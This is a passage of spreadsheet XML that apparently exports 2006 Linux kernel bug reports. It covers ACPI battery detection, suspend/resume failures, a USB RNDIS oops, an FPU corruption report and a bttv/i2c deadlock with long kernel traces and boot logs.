  <si>
    <t>Ben Okopnik</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown ('swsusp' has not worked for me until now) Distribution: Debian unstable Hardware Environment: Acer Aspire 2010 laptop, Pentium M 1.5Ghz Software Environment: 2.6.18 kernel Problem Description: When 'acpi_cpufreq' is loaded, issuing 'echo disk&gt;/sys/power/state' results in the following console message (among normal usb-related messages): "Could not power down device `</t>
  </si>
  <si>
    <t>battery not detected on laptop - nec versa p550</t>
  </si>
  <si>
    <t>2006-09-25 04:03 UTC</t>
  </si>
  <si>
    <t>Stefan Geuns</t>
  </si>
  <si>
    <t>2007-02-20 22:39 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: fedora/ubuntu/suse Hardware Environment: nec versa p550 Software Environment: fedora core &lt;= 5.90, ubuntu &lt;= 6.06, suse 10 Problem Description: The battery is not found after booting. But when I plugin the power cord or remove it then the battery is and remains detected. Steps to reproduce: Boot and see: battery not present. acpi version: 1.04 Battery info after plugging in the cable: $ cat /proc/acpi/battery/BAT1/info present: yes design capacity: 4800 mAh last full capacity: 3507 mAh battery technology: rechargeable design voltage: 14800 mV design capacity warning: 400 mAh design capacity low: 140 mAh capacity granularity 1: 64 mAh capacity granularity 2: 64 mAh model number: PC-VP-WP66/OP-570-76620 serial number: battery type: LION OEM info: NEC</t>
  </si>
  <si>
    <t>Connecting Nokia E70 via USB - unregistering non-registered device?</t>
  </si>
  <si>
    <t>2006-09-25 06:17 UTC</t>
  </si>
  <si>
    <t>Sam Freed</t>
  </si>
  <si>
    <t>2007-06-30 16:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None I know Distribution: Debian unstable, but my own kernel compile off kernel.org Hardware Environment: Toshiba R100, with docking station Software Environment: Debian unstable Problem Description: I connect the nokia E70 (a symbian S60 3rd edition device) to the USB, and select "PC Suite". The kernel spews the following: Sep 25 16:16:52 r100 kernel: usb 1-3.4: new full speed USB device using ehci_hcd and address 9 Sep 25 16:16:52 r100 kernel: usb 1-3.4: configuration #1 chosen from 1 choice Sep 25 16:16:53 r100 kernel: cdc_acm 1-3.4:1.12: ttyACM0: USB ACM device Sep 25 16:16:53 r100 kernel: usbcore: registered new driver cdc_acm Sep 25 16:16:53 r100 kernel: drivers/usb/class/cdc-acm.c: v0.25:USB Abstract Control Model driver for USB modems and ISDN adapters Sep 25 16:16:53 r100 kernel: usbcore: registered new driver cdc_ether Sep 25 16:16:53 r100 kernel: usb%%d: unregister 'rndis_host' usb-0000:00:1d.7-3.4, RNDIS device Sep 25 16:16:53 r100 kernel: unregister_netdevice: device usb%%d/c343b000 never was registered Sep 25 16:16:53 r100 kernel: Modules linked in: rndis_host cdc_ether usbnet cdc_acm rfcomm l2cap thermal fan button processor ac battery usblp mct_u232 usbserial ipv6 usbhid hci_usb bluetooth arc4 ieee80211_crypt_wep msdos fat nls_iso8859_1 ntfs dm_snapshot dm_mirror dm_mod ide_cd cdrom 8250_pci joydev snd_intel8x0 snd_intel8x0m snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss mousedev snd_pcm snd_timer tsdev snd ipw2100 ehci_hcd uhci_hcd intel_agp soundcore yenta_socket rsrc_nonstatic pcmcia ieee80211 ieee80211_crypt shpchp pci_hotplug usbcore agpgart psmouse pcmcia_core rtc snd_page_alloc firmware_class pcspkr e100 mii serio_raw evdev ext3 jbd mbcache ide_disk ide_generic via82cxxx trm290 triflex slc90e66 sis5513 siimage serverworks sc1200 rz1000 piix pdc202xx_old pdc202xx_new opti621 ns87415 it821x hpt366 hpt34x generic cy82c693 cs5535 cs5530 cs5520 cmd64x atiixp amd74xx alim15x3 aec62xx ide_core Sep 25 16:16:53 r100 kernel: EIP: 0060:[&lt;b0154b0f&gt;] Not tainted VLI Sep 25 16:16:53 r100 kernel: EFLAGS: 00010046 (2.6.18 #2) Sep 25 16:16:53 r100 kernel: [&lt;d0bd3014&gt;] usbnet_probe+0x4ee/0x503 [usbnet] Sep 25 16:16:53 r100 kernel: [&lt;b020ce28&gt;] __driver_attach+0x0/0x5d Sep 25 16:16:53 r100 kernel: [&lt;d0941ba1&gt;] usb_probe_interface+0x58/0x87 [usbcore] Sep 25 16:16:53 r100 kernel: [&lt;b020cd89&gt;] driver_probe_device+0x42/0x8b Sep 25 16:16:53 r100 kernel: [&lt;b020ce60&gt;] __driver_attach+0x38/0x5d Sep 25 16:16:53 r100 kernel: [&lt;b020c8aa&gt;] bus_for_each_dev+0x33/0x55 Sep 25 16:16:53 r100 kernel: [&lt;b020ccf3&gt;] driver_attach+0x11/0x13 Sep 25 16:16:53 r100 kernel: [&lt;b020ce28&gt;] __driver_attach+0x0/0x5d Sep 25 16:16:53 r100 kernel: [&lt;b020c5c3&gt;] bus_add_driver+0x64/0xfd Sep 25 16:16:53 r100 kernel: [&lt;d09419d6&gt;] usb_register_driver+0x60/0xbb [usbcore] Sep 25 16:16:53 r100 kernel: [&lt;b01354ce&gt;] sys_init_module+0x1692/0x1815 Sep 25 16:16:53 r100 kernel: [&lt;b0102c73&gt;] syscall_call+0x7/0xb Sep 25 16:16:53 r100 udevd-event[5375]: run_program: '/sbin/modprobe' abnormal exit USB system bocomes unstable. on 2.6.17 (debian version -2) the kernel would crash pretty fast after this. In this version it seems I can still use firefox to send this bug. Steps to reproduce: As above.</t>
  </si>
  <si>
    <t>acpi not recognize residual charge on packard bell easynote S5011</t>
  </si>
  <si>
    <t>2006-09-26 03:23 UTC</t>
  </si>
  <si>
    <t>Fanini Enrico</t>
  </si>
  <si>
    <t>2006-10-13 11:45 UTC</t>
  </si>
  <si>
    <t>On start of my notebook, with kde, Klaptop not display my residual charge. Start with only battery: confix@portatile ~ $ cat /proc/acpi/battery/BAT1/info present: no confix@portatile ~ $ cat /proc/acpi/battery/BAT1/state present: no After i insert and disconnect AC Power Supply: confix@portatile ~ $ cat /proc/acpi/battery/BAT1/state present: yes capacity state: ok charging state: discharging present rate: 2240 mA remaining capacity: 1731 mAh present voltage: 12321 mV confix@portatile ~ $ cat /proc/acpi/battery/BAT1/info present: yes design capacity: 4000 mAh last full capacity: 3089 mAh battery technology: rechargeable design voltage: 9600 mV design capacity warning: 400 mAh design capacity low: 123 mAh capacity granularity 1: 64 mAh capacity granularity 2: 64 mAh model number: PC-VP-WP66/OP-570-76620 serial number: battery type: NiMH OEM info: NEC and klaptop display residual charge.</t>
  </si>
  <si>
    <t>suspend/resume broken for e1000</t>
  </si>
  <si>
    <t>2006-09-26 07:21 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.17 I observed at my Thinkpad t41 that after a wakeup from a suspend to mem/disk pppoe-start failed and I got in my log filegot that message. Restarting the network (at least: "ifconfig eth0 down; ifconfig eth0 up") solved the problem but that behaviour is annoying. The last good commit is acfbc9fde2ec7f304398f6ad7644002e07bf84bc. The first bad commit is 2db10a081c5c1082d58809a1bcf1a6073f4db160. The initial bug report can be found here https://bugs.gentoo.org/show_bug.cgi?id=146005 the problem was discussed at the mailing-list e1000-devel@lists.sourceforge.net with Auke Kok &lt;auke-jan.h.kok@intel.com&gt; in mid of september of this year.</t>
  </si>
  <si>
    <t>ASL compiler uses wrong scope when creating byte field on resource template</t>
  </si>
  <si>
    <t>latest ACPICA version (20060912)</t>
  </si>
  <si>
    <t>2006-09-27 02:15 UTC</t>
  </si>
  <si>
    <t>2007-01-15 09:22 UTC</t>
  </si>
  <si>
    <t>I will attach acpidump... Disassembling and recompiling DSDT included there will result in one error: DSDT.dsl 7123: CreateByteField (C196, \_SB.C002.C003._Y0F._LEN, C063) Error 4062 - Object does not exist ^ (\_SB.C002.C003._Y0F._LEN) Adding C240 to the path in CreateByteField: CreateByteField (C196, \_SB.C002.C003.C240._Y0F._LEN, C063) solves the problem. Strange is, that similar code is used in other parts of the DSDT (grep for CreateByteField) where the path is set up correctly. Tested with latest ACPICA version (20060912).</t>
  </si>
  <si>
    <t>saa7134: no sound after suspend to disk</t>
  </si>
  <si>
    <t>2006-09-27 17:26 UTC</t>
  </si>
  <si>
    <t>2007-10-12 03:18 UTC</t>
  </si>
  <si>
    <t>I have observed the following problem with all kernels I tried (up to 2.6.18-rc6-mm2): After suspend-from-disk, everything works fine except for my saa7134 card: The picture is still fine, but there is no sound. It seems saa7134 needs some initialization after resume?</t>
  </si>
  <si>
    <t>acpi_cpufreq_target calls smp_processor_id while preemptible</t>
  </si>
  <si>
    <t>2006-09-28 01:36 UTC</t>
  </si>
  <si>
    <t>2007-04-05 15:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: &lt;shrug&gt; At the very least, before cpufreq existed Distribution: ubuntu Hardware Environment: IBM x346, 2x 3.6GHz Xeon with EIST enabled. Software Environment: Problem Description: acpi_cpufreq_target should disable preemption when it calls smp_processor_id; its failure to do so results in complaints in dmesg. Steps to reproduce: 1. Build kernel with CONFIG_PREEMPT_DEBUGGING=y 2. Boot system 3. Observe complaints in dmesg: BUG: using smp_processor_id() in preemptible [00000001] code: powernowd/1930 caller is acpi_cpufreq_target+0x14b/0x266 [acpi_cpufreq] Call Trace: [&lt;ffffffff8016b1b1&gt;] show_trace+0xae/0x33a [&lt;ffffffff8016b654&gt;] dump_stack+0x13/0x15 [&lt;ffffffff8023dff8&gt;] debug_smp_processor_id+0xbb/0xcb [&lt;ffffffff88263779&gt;] :acpi_cpufreq:acpi_cpufreq_target+0x14b/0x266 [&lt;ffffffff802db992&gt;] __cpufreq_driver_target+0x62/0x72 [&lt;ffffffff8824f112&gt;] :cpufreq_userspace:store_speed+0xb1/0xd3 [&lt;ffffffff801719d7&gt;] store+0x4a/0x64 [&lt;ffffffff801f66c7&gt;] sysfs_write_file+0xc9/0x102 [&lt;ffffffff80115412&gt;] vfs_write+0xae/0x154 [&lt;ffffffff80115cd3&gt;] sys_write+0x47/0x6f [&lt;ffffffff8015ca8e&gt;] system_call+0x7e/0x83 DWARF2 unwinder stuck at system_call+0x7e/0x83 Leftover inexact backtrace: I'm not quite sure how to fix this one--disable preemption in that acpi_cpufreq_target function? That may be a big hammer to swing though. In any case I'm not the author so I don't really know.</t>
  </si>
  <si>
    <t>FPU state corruption.</t>
  </si>
  <si>
    <t>2006-09-28 05:02 UTC</t>
  </si>
  <si>
    <t>Douglas Crosher</t>
  </si>
  <si>
    <t>2006-10-02 13:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Fedora Core 5 Hardware Environment: Athlon64, single processor, 1GB memory. Software Environment: Problem Description: On a heavily loaded web server, the floating point state of random processes is corrupted leading to unexpected floating pointer exceptions. The attached program assists with reproducing this problem, although it will generally not reproduce the problem on its own, but only when run on a heavily loaded web server. The problem appears independent of the kernel preemption configuration option, and still appears with preemption disabled. The attached program creates a lot of shortly lived threads that do a little FPU work before exiting, and this appears to aggravate the problem. Patching the function '__switch_to' in arch/x86_64/kernel/process.c to call math_state_restore just before returning resolves the problem. This may suggest a problem in the lazy FPU save path. There is a new 'sleazy' FPU state saving option being added to the 2.6.19 kernel, and this may mask some of the corruption, but the problem may remain but be even less likely to occur and even harder to track down. Since FPU corruption can cause incorrect program execution and output, perhaps the lazy FPU state saving feature should be disabled until this problem has been resolved.</t>
  </si>
  <si>
    <t>bttv initialisation hang, may be i2c locking deadlock</t>
  </si>
  <si>
    <t>2.6.18-git11</t>
  </si>
  <si>
    <t>2006-09-29 11:57 UTC</t>
  </si>
  <si>
    <t>Torsten Kaiser</t>
  </si>
  <si>
    <t>2006-10-01 00:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18_rc2-mm1 Kernel that have this bug: MM-Kernel from 2.6.18_rc6-mm1 2.6.18-git11 also has this bug Distribution: Gentoo-2006.1 Hardware Environment: 00:00.0 Host bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133] (rev 03) 00:01.0 PCI bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133 AGP] 00:07.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 22) 00:07.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 10) 00:07.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 10) 00:07.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 10) 00:07.4 Host bridge: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 30) 00:07.5 Multimedia audio controller: VIA Technologies, Inc. VT82C686 AC97 Audio Controller (rev 20) 00:07.6 Communication controller: VIA Technologies, Inc. AC'97 Modem Controller (rev 20) 00:08.0 Ethernet controller: MYSON Technology Inc SURECOM EP-320X-S 100/10M Ethernet PCI Adapter 00:09.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) 00:09.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) 01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev a1) (I only use the Xorg-nv-driver and FB_NVIDIA included in the kernel) Software Environment: uptodate Gentoo x86 unstable: binutils-2.17; gcc-4.1.1; udev-100-r2; module-init-tools-3.2.2-r1 Problem Description: booting with bttv compiled into the kernel hangs completly. Using bttv (and its submodules) as modules udev fails to load all needed submodules, because one modprobe process hangs in state D. The system still functions normaly, only my tv-card no longer works. Steps to reproduce: Booting any of the affected kernels on this systems. More infos about the hanging processes: ps axf after booting with bttv as module and then switch to runlevel 1: PID TTY STAT TIME COMMAND 1 ? Ss 0:01 init [1] 2 ? SN 0:00 [ksoftirqd/0] 3 ? S&lt; 0:00 [events/0] 4 ? S&lt; 0:00 [khelper] 2469 ? S&lt; 0:00 \_ [khelper] 2470 ? D&lt; 0:00 \_ /sbin/modprobe -q -- msp3400 5 ? S&lt; 0:00 [kthread] 8 ? S&lt; 0:00 \_ [kblockd/0] 9 ? S&lt; 0:00 \_ [kacpid] 71 ? S&lt; 0:00 \_ [ksuspend_usbd] 74 ? S&lt; 0:00 \_ [khubd] 76 ? S&lt; 0:00 \_ [kseriod] 147 ? S 0:00 \_ [pdflush] 148 ? S 0:00 \_ [pdflush] 149 ? S&lt; 0:00 \_ [kswapd0] 150 ? S&lt; 0:00 \_ [aio/0] 151 ? S&lt; 0:00 \_ [xfslogd/0] 152 ? S&lt; 0:00 \_ [xfsdatad/0] 754 ? S&lt; 0:00 \_ [ata/0] 755 ? S&lt; 0:00 \_ [ata_aux] 757 ? S&lt; 0:00 \_ [scsi_eh_0] 758 ? S&lt; 0:00 \_ [scsi_eh_1] 782 ? S&lt; 0:00 \_ [khpsbpkt] 809 ? S&lt; 0:00 \_ [kpsmoused] 843 ? S&lt; 0:00 \_ [ac97/0] 855 ? S&lt; 0:00 \_ [xfsbufd] 856 ? S&lt; 0:00 \_ [xfssyncd] 2480 ? S&lt; 0:00 \_ [msp34xx] 3514 ? S&lt; 0:00 \_ [xfsbufd] 3522 ? S&lt; 0:00 \_ [xfssyncd] 1033 ? S&lt;s 0:01 /sbin/udevd --daemon 1946 ? D&lt; 0:00 /sbin/modprobe pci:v0000109Ed0000036Esv00000070sd000013EBbc04sc00i00 10548 tty1 Ss 0:00 /bin/login -- 10596 tty1 S 0:00 \_ -bash 10615 tty1 R+ 0:00 \_ ps axf relevant parts of SysRq-T: [ 204.620000] khelper S 00000282 0 4 1 2469 5 3 (L-TLB) [ 204.620000] dffc7f80 00000046 00000086 00000282 dffc7f54 00000086 00000000 00000000 [ 204.620000] 0000000a dffc6ab0 4e6ec800 0000001b 00000000 dffc6bc0 003d97cf dffe5438 [ 204.620000] 008b20d9 00000000 dffe5428 dffe5430 dffe5420 dffc7f9c c0128517 00000001 [ 204.620000] Call Trace: [ 204.620000] [&lt;c0128517&gt;] worker_thread+0x107/0x140 [ 204.620000] [&lt;c01169a0&gt;] default_wake_function+0x0/0x10 [ 204.620000] [&lt;c0128410&gt;] worker_thread+0x0/0x140 [ 204.620000] [&lt;c012ace4&gt;] kthread+0xe4/0xf0 [ 204.620000] [&lt;c012ac00&gt;] kthread+0x0/0xf0 [ 204.620000] [&lt;c0103a23&gt;] kernel_thread_helper+0x7/0x14 [ 204.620000] ======================= [ 204.620000] kthread S 00000296 0 5 1 8 1033 4 (L-TLB) [ 204.620000] dffd0f80 00000046 00000086 00000296 dffd0f54 00000086 00000000 00000000 [ 204.620000] 0000000a dffc6580 e6b47f00 00000012 00000000 dffc6690 00000000 dffe5478 [ 204.620000] 00026817 00000000 dffe5468 dffe5470 dffe5460 dffd0f9c c0128517 00000001 [ 204.620000] Call Trace: [ 204.620000] [&lt;c0128517&gt;] worker_thread+0x107/0x140 [ 204.620000] [&lt;c01169a0&gt;] default_wake_function+0x0/0x10 [ 204.620000] [&lt;c0128410&gt;] worker_thread+0x0/0x140 [ 204.620000] [&lt;c012ace4&gt;] kthread+0xe4/0xf0 [ 204.620000] [&lt;c012ac00&gt;] kthread+0x0/0xf0 [ 204.620000] [&lt;c0103a23&gt;] kernel_thread_helper+0x7/0x14 [ 204.620000] ======================= [ 204.620000] udevd S 00000246 0 1033 1 10548 5 (NOTLB) [ 204.620000] df37ab50 00000086 00000046 00000246 df670760 00000246 43ba3000 00000027 [ 204.620000] 00000008 dff20580 1623b580 0000002c 00000000 dff20690 00000000 00000000 [ 204.620000] 4ead9a00 00000000 00000008 00000000 00000000 00000000 c0408eda df103600 [ 204.620000] Call Trace: [ 204.620000] [&lt;c0408eda&gt;] schedule_timeout+0x7a/0xd0 [ 204.620000] [&lt;c0409188&gt;] mutex_lock+0x8/0x20 [ 204.620000] [&lt;c017b897&gt;] inotify_poll+0x47/0x70 [ 204.620000] [&lt;c0166c81&gt;] do_select+0x3a1/0x490 [ 204.620000] [&lt;c0167360&gt;] __pollwait+0x0/0x100 [ 204.620000] [&lt;c01169a0&gt;] default_wake_function+0x0/0x10 [ 204.620000] [&lt;c01169a0&gt;] default_wake_function+0x0/0x10 [ 204.620000] [&lt;c01169a0&gt;] default_wake_function+0x0/0x10 [ 204.620000] [&lt;c01169a0&gt;] default_wake_function+0x0/0x10 [ 204.620000] [&lt;c01150a0&gt;] do_page_fault+0x4d0/0x610 [ 204.620000] [&lt;c0114bd0&gt;] do_page_fault+0x0/0x610 [ 204.620000] [&lt;c040a089&gt;] error_code+0x39/0x40 [ 204.620000] [&lt;c013c0a2&gt;] __pagevec_free+0x22/0x30 [ 204.620000] [&lt;c013e355&gt;] release_pages+0xe5/0x100 [ 204.620000] [&lt;c036c7e9&gt;] skb_copy_datagram_iovec+0x169/0x220 [ 204.620000] [&lt;c0184d0e&gt;] proc_alloc_inode+0x3e/0x70 [ 204.620000] [&lt;c016c8da&gt;] alloc_inode+0xca/0x180 [ 204.620000] [&lt;c016d688&gt;] iget_locked+0x88/0x140 [ 204.620000] [&lt;c0184e2d&gt;] proc_get_inode+0xed/0x160 [ 204.620000] [&lt;c016aff9&gt;] d_instantiate+0x49/0x80 [ 204.620000] [&lt;c018879d&gt;] proc_lookup+0x7d/0x90 [ 204.620000] [&lt;c01611f5&gt;] do_lookup+0x65/0x190 [ 204.620000] [&lt;c0161518&gt;] permission+0xd8/0x100 [ 204.620000] [&lt;c016b583&gt;] dput+0xb3/0x120 [ 204.620000] [&lt;c0162d93&gt;] __link_path_walk+0x343/0xdf0 [ 204.620000] [&lt;c0166f2b&gt;] core_sys_select+0x1bb/0x2f0 [ 204.620000] [&lt;c0161518&gt;] permission+0xd8/0x100 [ 204.620000] [&lt;c016f05b&gt;] mntput_no_expire+0x1b/0x70 [ 204.620000] [&lt;c0162d93&gt;] __link_path_walk+0x343/0xdf0 [ 204.620000] [&lt;c0161fef&gt;] vfs_rename+0x30f/0x480 [ 204.620000] [&lt;c016f05b&gt;] mntput_no_expire+0x1b/0x70 [ 204.620000] [&lt;c01638af&gt;] link_path_walk+0x6f/0xe0 [ 204.620000] [&lt;c0161518&gt;] permission+0xd8/0x100 [ 204.620000] [&lt;c011bfe8&gt;] do_wait+0x458/0xa60 [ 204.620000] [&lt;c016b583&gt;] dput+0xb3/0x120 [ 204.620000] [&lt;c016b583&gt;] dput+0xb3/0x120 [ 204.620000] [&lt;c016770b&gt;] sys_select+0x4b/0x1c0 [ 204.620000] [&lt;c011c621&gt;] sys_wait4+0x31/0x40 [ 204.620000] [&lt;c0102e2d&gt;] sysenter_past_esp+0x56/0x79 [ 204.620000] ======================= [ 204.620000] modprobe D 00000003 0 1946 1 10548 (NOTLB) [ 204.620000] c17fecb0 00000082 515dbe80 00000003 00000005 dffc6ab0 4cc1927a 00000003 [ 204.620000] 00000005 dfade560 515dbe80 00000003 00000000 dfade670 01f24b7a 00000000 [ 204.620000] 07270e00 00000000 c17fed24 dffc33e0 c17fed08 c17fecd0 c0408a58 00000001 [ 204.620000] Call Trace: [ 204.620000] [&lt;c0408a58&gt;] wait_for_completion+0x58/0x90 [ 204.620000] [&lt;c01169a0&gt;] default_wake_function+0x0/0x10 [ 204.620000] [&lt;c012798f&gt;] call_usermodehelper_keys+0xbf/0xd0 [ 204.620000] [&lt;c01279a0&gt;] __call_usermodehelper+0x0/0x70 [ 204.620000] [&lt;c0127b4c&gt;] request_module+0x9c/0xe0 [ 204.620000] [&lt;c011a7ab&gt;] printk+0x1b/0x20 [ 204.620000] [&lt;e1934105&gt;] bttv_I2CRead+0x115/0x130 [bttv] [ 204.620000] [&lt;e192f9d5&gt;] bttv_init_card2+0x485/0x1650 [bttv] [ 204.620000] [&lt;c0323c51&gt;] i2c_add_adapter+0x41/0x270 [ 204.620000] [&lt;e192e4a3&gt;] bttv_probe+0x3f3/0x790 [bttv] [ 204.620000] [&lt;c0253666&gt;] pci_device_probe+0x56/0x80 [ 204.620000] [&lt;c02aee5a&gt;] really_probe+0x3a/0xf0 [ 204.620000] [&lt;c02aef4f&gt;] driver_probe_device+0x3f/0xa0 [ 204.620000] [&lt;c02af0da&gt;] __driver_attach+0x9a/0xa0 [ 204.620000] [&lt;c02ae82a&gt;] bus_for_each_dev+0x3a/0x60 [ 204.620000] [&lt;c02aed66&gt;] driver_attach+0x16/0x20 [ 204.620000] [&lt;c02af040&gt;] __driver_attach+0x0/0xa0 [ 204.620000] [&lt;c02ae43b&gt;] bus_add_driver+0x7b/0x190 [ 204.620000] [&lt;c025380b&gt;] __pci_register_driver+0x5b/0x80 [ 204.620000] [&lt;c01322b3&gt;] sys_init_module+0x153/0x16f0 [ 204.620000] [&lt;e191c098&gt;] packet_create+0x108/0x130 [af_packet] [ 204.620000] [&lt;e191bfa8&gt;] packet_create+0x18/0x130 [af_packet] [ 204.620000] [&lt;e191c0c0&gt;] packet_getname_spkt+0x0/0x90 [af_packet] [ 204.620000] [&lt;e191bc84&gt;] packet_sendmsg+0x1c4/0x270 [af_packet] [ 204.620000] [&lt;e191c0e8&gt;] packet_getname_spkt+0x28/0x90 [af_packet] [ 204.620000] [&lt;c0102e2d&gt;] sysenter_past_esp+0x56/0x79 [ 204.620000] ======================= [ 204.620000] khelper S 00000002 0 2469 4 2470 (L-TLB) [ 204.620000] df1c4f3c 00000046 c01161a7 00000002 df533560 df1c4f18 00000282 00800111 [ 204.620000] 00000002 dffa7ab0 51f65500 00000003 00000000 dffa7bc0 00000000 00000000 [ 204.620000] 00000000 00000000 c17fed08 df533560 00000001 00000004 c011c17e 00000000 [ 204.620000] Call Trace: [ 204.620000] [&lt;c01161a7&gt;] __activate_task+0x27/0x40 [ 204.620000] [&lt;c011c17e&gt;] do_wait+0x5ee/0xa60 [ 204.620000] [&lt;c01012fe&gt;] kernel_thread+0x8e/0xb0 [ 204.620000] [&lt;c01169a0&gt;] default_wake_function+0x0/0x10 [ 204.620000] [&lt;c011c621&gt;] sys_wait4+0x31/0x40 [ 204.620000] [&lt;c0127a86&gt;] wait_for_helper+0x76/0xa0 [ 204.620000] [&lt;c0127a10&gt;] wait_for_helper+0x0/0xa0 [ 204.620000] [&lt;c0103a23&gt;] kernel_thread_helper+0x7/0x14 [ 204.620000] ======================= [ 204.620000] modprobe D DF670900 0 2470 2469 (NOTLB) [ 204.620000] df705d74 00000086 c1496560 df670900 df533560 dffc6690 dffd0f80 c040858b [ 204.620000] 00000001 df533560 54f14580 00000003 00000000 df533670 54f14580 00000003 [ 204.620000] 01c9c380 00000000 e1946d4c ffffffff df533560 e1946d50 c0409292 e1946d50 [ 204.620000] Call Trace: [ 204.620000] [&lt;c040858b&gt;] __sched_text_start+0x2ab/0x5e0 [ 204.620000] [&lt;c0409292&gt;] __mutex_lock_slowpath+0x42/0x70 [ 204.620000] [&lt;c0409193&gt;] mutex_lock+0x13/0x20 [ 204.620000] [&lt;c0323b6b&gt;] i2c_clients_command+0x1b/0xc0 [ 204.620000] [&lt;e19342d7&gt;] attach_inform+0xb7/0x110 [bttv] [ 204.620000] [&lt;c0324103&gt;] i2c_attach_client+0x73/0x1c0 [ 204.620000] [&lt;e08dd8fb&gt;] msp_attach+0x42b/0x5c0 [msp3400] [ 204.620000] [&lt;e08df0f0&gt;] msp3410d_thread+0x0/0x560 [msp3400] [ 204.620000] [&lt;c03231ee&gt;] i2c_probe_address+0x3e/0x130 [ 204.620000] [&lt;c018e38a&gt;] sysfs_create_link+0x7a/0x180 [ 204.620000] [&lt;c03234ec&gt;] i2c_probe+0x20c/0x220 [ 204.620000] [&lt;e08dd4d0&gt;] msp_attach+0x0/0x5c0 [msp3400] [ 204.620000] [&lt;c02af333&gt;] driver_create_file+0x33/0x50 [ 204.620000] [&lt;e08dd4d0&gt;] msp_attach+0x0/0x5c0 [msp3400] [ 204.620000] [&lt;c03238a9&gt;] i2c_register_driver+0x79/0xa0 [ 204.620000] [&lt;c01322b3&gt;] sys_init_module+0x153/0x16f0 [ 204.620000] [&lt;c0102e2d&gt;] sysenter_past_esp+0x56/0x79 [ 204.620000] ======================= [ 204.620000] msp34xx S 00000246 0 2480 5 3514 856 (L-TLB) [ 204.620000] df924f70 00000046 00000000 00000246 df359b00 00000000 df217300 00000001 [ 204.620000] 00000009 c1509560 54f14580 00000003 00000000 c1509670 dffc6580 df924f68 [ 204.620000] 00000000 00000000 dec6b73c ffffffff dec6b6c0 df93be00 e08dc9b4 00000000 [ 204.620000] Call Trace: [ 204.620000] [&lt;e08dc9b4&gt;] msp_sleep+0xc4/0xd0 [msp3400] [ 204.620000] [&lt;c01169a0&gt;] default_wake_function+0x0/0x10 [ 204.620000] [&lt;e08df174&gt;] msp3410d_thread+0x84/0x560 [msp3400] [ 204.620000] [&lt;e08df0f0&gt;] msp3410d_thread+0x0/0x560 [msp3400] [ 204.620000] [&lt;c012ace4&gt;] kthread+0xe4/0xf0 [ 204.620000] [&lt;c012ac00&gt;] kthread+0x0/0xf0 [ 204.620000] [&lt;c0103a23&gt;] kernel_thread_helper+0x7/0x14 [ 204.620000] ======================= For me it looks like a deadlock in the i2c locking: * modprobe-1946 waits for the khelper-thread, but has i2c_add_adapter+0x41/0x270 in its calltrace * modprobe-2470 from the khelper-thread waits for a mutex related to i2c_clients_command+0x1b/0xc0 dmesg from not working kernel 2.6.18-git11: [ 0.000000] Linux version 2.6.18-git11 (root@ariolc) (gcc version 4.1.1 (Gentoo 4.1.1-r1)) #1 Fri Sep 29 20:11:42 CEST 2006 [ 0.000000] BIOS-provided physical RAM map: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) [ 0.000000] BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) [ 0.000000] BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) [ 0.000000] BIOS-e820: 0000000000100000 - 000000001fff0000 (usable) [ 0.000000] BIOS-e820: 000000001fff0000 - 000000001fff3000 (ACPI NVS) [ 0.000000] BIOS-e820: 000000001fff3000 - 0000000020000000 (ACPI data) [ 0.000000] BIOS-e820: 00000000ffff0000 - 0000000100000000 (reserved) [ 0.000000] 511MB LOWMEM available. [ 0.000000] Entering add_active_range(0, 0, 131056) 0 entries of 256 used [ 0.000000] Zone PFN ranges: [ 0.000000] DMA 0 -&gt; 4096 [ 0.000000] Normal 4096 -&gt; 131056 [ 0.000000] early_node_map[1] active PFN ranges [ 0.000000] 0: 0 -&gt; 131056 [ 0.000000] On node 0 totalpages: 131056 [ 0.000000] DMA zone: 32 pages used for memmap [ 0.000000] DMA zone: 0 pages reserved [ 0.000000] DMA zone: 4064 pages, LIFO batch:0 [ 0.000000] Normal zone: 991 pages used for memmap [ 0.000000] Normal zone: 125969 pages, LIFO batch:31 [ 0.000000] DMI 2.3 present. [ 0.000000] ACPI: RSDP (v000 BIOSTA ) @ 0x000f7440 [ 0.000000] ACPI: RSDT (v001 BIOSTA AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x1fff3000 [ 0.000000] ACPI: FADT (v001 BIOSTA AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x1fff3040 [ 0.000000] ACPI: DSDT (v001 VIA694 AWRDACPI 0x00001000 MSFT 0x0100000c) @ 0x00000000 [ 0.000000] ACPI: PM-Timer IO Port: 0x4008 [ 0.000000] Allocating PCI resources starting at 30000000 (gap: 20000000:dfff0000) [ 0.000000] Detected 1002.305 MHz processor. [ 19.250911] Built 1 zonelists. Total pages: 130033 [ 19.250916] Kernel command line: root=/dev/sdb2 console=ttyS0,38400 console=tty1 lapic [ 19.251317] Local APIC disabled by BIOS -- reenabling. [ 19.251322] Found and enabled local APIC! [ 19.251328] mapped APIC to ffffd000 (fee00000) [ 19.251335] Enabling fast FPU save and restore... done. [ 19.251340] Initializing CPU#0 [ 19.251476] CPU 0 irqstacks, hard=c0592000 soft=c0591000 [ 19.251483] PID hash table entries: 2048 (order: 11, 8192 bytes) [ 